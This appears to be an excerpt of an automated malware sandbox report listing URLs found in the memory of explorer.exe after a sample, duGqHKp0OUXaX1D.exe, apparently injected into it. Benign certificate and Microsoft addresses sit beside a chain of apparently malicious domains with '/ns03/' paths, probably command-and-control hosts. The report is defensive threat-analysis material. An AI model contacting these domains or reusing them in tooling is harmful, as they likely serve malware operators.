                Source: explorer.exe, 00000003.00000000.1380877734.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1380877734.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1380877734.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3834090236.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: explorer.exe, 00000003.00000002.3830315645.0000000004405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1374239731.0000000004405000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobeS
                Source: duGqHKp0OUXaX1D.exeString found in binary or memory: http://ocsp.comodoca.com0
                Source: explorer.exe, 00000003.00000000.1380877734.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1380877734.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: explorer.exe, 00000003.00000000.1380877734.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3833748992.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                Source: explorer.exe, 00000003.00000002.3832797190.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1373381409.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1378345938.0000000007720000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.agathis.fun
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.agathis.fun/ns03/
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.agathis.fun/ns03/www.grupooceanique.com
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.agathis.funReferer:
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.beatricesswarthout.xyz
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.beatricesswarthout.xyz/ns03/
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.beatricesswarthout.xyz/ns03/www.engagenotrage.com
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.beatricesswarthout.xyzReferer:
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.chuanruhaomen.com
                Source: explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.chuanruhaomen.com/ns03/
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.chuanruhaomen.comReferer:
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.elizabethsbookshelf.com
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.elizabethsbookshelf.com/ns03/
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.elizabethsbookshelf.com/ns03/www.leclandesparents.com
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.elizabethsbookshelf.comReferer:
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.engagenotrage.com
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.engagenotrage.com/ns03/
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.engagenotrage.com/ns03/www.velvetgloveseasonings.store
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.engagenotrage.comReferer:
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fichaphuman.net
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fichaphuman.net/ns03/
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fichaphuman.net/ns03/www.elizabethsbookshelf.com
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fichaphuman.netReferer:
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fonbnk.pro
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fonbnk.pro/ns03/
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fonbnk.pro/ns03/www.scheuermannworks.com
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fonbnk.proReferer:
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gildedbeautyaesthitics.com
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gildedbeautyaesthitics.com/ns03/
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gildedbeautyaesthitics.com/ns03/www.maxhealthunity.com
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gildedbeautyaesthitics.comReferer:
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.grupooceanique.com
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.grupooceanique.com/ns03/
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.grupooceanique.com/ns03/www.repair-services.today
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.grupooceanique.comReferer:
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.leclandesparents.com
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.leclandesparents.com/ns03/
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.leclandesparents.com/ns03/www.yedxec.xyz
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.leclandesparents.comReferer:
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maxhealthunity.com
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maxhealthunity.com/ns03/
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maxhealthunity.com/ns03/www.fonbnk.pro
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maxhealthunity.comReferer:
                Source: explorer.exe, 00000003.00000003.2284258372.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1380877734.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3834090236.0000000009237000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.repair-services.today
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.repair-services.today/ns03/
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.repair-services.today/ns03/www.taiyuanbaoyang.com
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.repair-services.todayReferer:
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.scheuermannworks.com
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.scheuermannworks.com/ns03/
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.scheuermannworks.com/ns03/www.fichaphuman.net
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.scheuermannworks.comReferer:
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.taiyuanbaoyang.com
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.taiyuanbaoyang.com/ns03/
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.taiyuanbaoyang.com/ns03/www.beatricesswarthout.xyz
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.taiyuanbaoyang.comReferer:
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.velvetgloveseasonings.store
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.velvetgloveseasonings.store/ns03/
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.velvetgloveseasonings.store/ns03/www.gildedbeautyaesthitics.com
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.velvetgloveseasonings.storeReferer:
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yedxec.xyz
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yedxec.xyz/ns03/
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yedxec.xyz/ns03/www.chuanruhaomen.com
                Source: explorer.exe, 00000003.00000002.3834090236.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3075845709.0000000009255000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yedxec.xyzReferer:
                Source: explorer.exe, 00000003.00000002.3836964822.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1390264939.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739539954.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076012374.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2286423731.000000000BCB4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
                Source: explorer.exe, 00000003.00000002.3836964822.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1390264939.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739539954.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076012374.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2286423731.000000000BCB4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                Source: explorer.exe, 00000003.00000002.3836964822.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1390264939.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739539954.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076012374.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2286423731.000000000BCB4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSA4
                Source: explorer.exe, 00000003.00000002.3836964822.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1390264939.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739539954.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076012374.000000000BCB7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2286423731.000000000BCB4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSd
                Source: explorer.exe, 00000003.00000003.2286029578.000000000704B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3832245990.000000000704E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.000000000702D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                Source: explorer.exe, 00000003.00000002.3831541427.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: explorer.exe, 00000003.00000000.1380877734.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2284258372.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3833748992.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
                Source: explorer.exe, 00000003.00000003.2286200010.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1375183688.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2739303761.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076473587.0000000006F33000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
